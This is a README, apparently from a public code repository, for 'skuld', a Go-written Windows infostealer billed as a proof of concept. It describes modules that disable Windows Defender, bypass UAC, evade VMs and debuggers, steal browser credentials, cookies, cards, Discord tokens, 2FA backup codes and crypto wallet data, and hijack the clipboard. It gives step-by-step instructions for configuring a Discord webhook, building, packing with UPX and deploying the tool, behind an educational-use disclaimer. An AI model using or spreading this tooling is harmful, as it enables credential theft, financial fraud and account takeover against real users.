Go-written Malware targeting Windows systems, extracting User Data from Discord, Browsers, Crypto Wallets and more, from every user on every disk. (PoC. For Educational Purposes only)
Table of Contents
This proof of concept project demonstrates a "Discord-oriented" stealer implemented in Go. The malware operates on Windows systems and use fodhelper.exe technique for privileges elevation. By elevating privileges, the malware gains access to all user sessions on every disk
- antidebug: Terminates debugging tools.
- antivirus: Disables Windows Defender and blocks access to antivirus websites.
- antivm: Detects and exits when running in virtual machines (VMs).
- browsers:
- Steals logins, cookies, credit cards, history, and download lists from 37 Chromium-based browsers.
- Steals logins, cookies, history, and download lists from 10 Gecko browsers.
- clipper: Replaces the user's clipboard content with a specified crypto address when copying another address.
- commonfiles: Steals sensitive files from common locations.
- discodes: Captures Discord Two-Factor Authentication (2FA) backup codes.
- discordinjection:
- Intercepts login, register, and 2FA login requests.
- Captures backup codes requests.
- Monitors email/password change requests.
- Intercepts credit card/PayPal addition requests.
- Blocks the use of QR codes for login.
- Prevents requests to view devices.
- fakerror: Trick user into believing the program closed due to an error.
- games: Extracts Epic Games, Uplay, Minecraft (14 launchers) and Riot Games sessions.
- hideconsole: Module to hide the console.
- startup: Ensures the program runs at system startup.
- system: Gathers CPU, GPU, RAM, IP, location, saved Wi-Fi networks, and more.
- tokens: Extracts tokens from 4 Discord applications, Chromium-based browsers, and Gecko browsers.
- uacbypass: Grants privileges to steal user data from others users.
- wallets: Steals data from 10 local wallets and 55 wallet extensions.
- walletsinjection: Captures mnemonic phrases and passwords from 2 crypto wallets.
To install this project using Git, follow these steps:
- Clone the Repository:
git clone https://github.com/hackirby/skuld
- Navigate to the Project Directory:
cd skuld
You can use the Project template:
-
Open
main.go
and edit config with your Discord webhook and your crypto addresses -
Build the template: (reduce binary size by using
-s -w
)
go build -ldflags "-s -w"
- You can hide the console without
hideconsole
module (you must removeprogram.IsAlreadyRunning()
check frommain.go
before) by running
go build -ldflags "-s -w -H=windowsgui"
- You can also optionally pack the output executable with UPX which will reduce the binary size from ~10MB to ~3MB. To do this, install UPX and run
upx.exe --ultra-brute skuld.exe
- You can also use skuld in your own Go code. Just import the desired module like this:
package main
import "github.com/hackirby/skuld/modules/hideconsole"
func main() {
hideconsole.Run()
}
This guide will help you removing skuld from your system
-
Open powershell as administrator
-
Kill processes that could be skuld
taskkill /f /t /im skuld.exe
taskkill /f /t /im SecurityHealthSystray.exe
(use tasklist
to list all running processes, skuld.exe and SecurityHealthSystray.exe are the default names)
- Remove skuld from startup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Realtek HD Audio Universal Service" /f
(Realtek HD Audio Universal Service is the default name)
- Enable Windows defender:
You can do it by running this .bat script (I'm not the developer behind it, make sure the file does not contain malware)
Contributions to this project are welcome! Feel free to open issues, submit pull requests, or suggest improvements. Make sure to follow the Contributing Guidelines
You can also support this project development by leaving a star ⭐ or by donating me. Every little tip helps!
This library is released under the MIT License. See LICENSE file for more informations.
If you have any questions or need further assistance, please contact @hackirby:matrix.org
This project has been greatly influenced by numerous infostealers available on GitHub. Many functions and sensitive paths have been derived from public repositories. My objective was to innovate by creating something new with code from existing projects. I extend my gratitude to all those whose work has contributed to this stealer, especially
- FallenAstaroth for tempfile-less browsers data extraction
- ᴍᴏᴏɴD4ʀᴋ for browsers data decryption
- addi00000 for Discord embeds design
- Blank-c for antivirus-related functions and more
- 6nz for antivm blacklists
This software, referred to as skuld, is provided strictly for educational and research purposes. Under no circumstances should this tool be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions.
By accessing and using this tool, you acknowledge that you are solely responsible for your actions. Any misuse of this software is strictly prohibited, and the creator (hackirby) disclaims any responsibility for how this tool is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction.
The creator (hackirby) of this tool shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use the tool.
The creator (hackirby) will not provide any support, guidance, or assistance related to the misuse of this tool. Any inquiries regarding malicious activities will be ignored.
By using this tool, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use the software.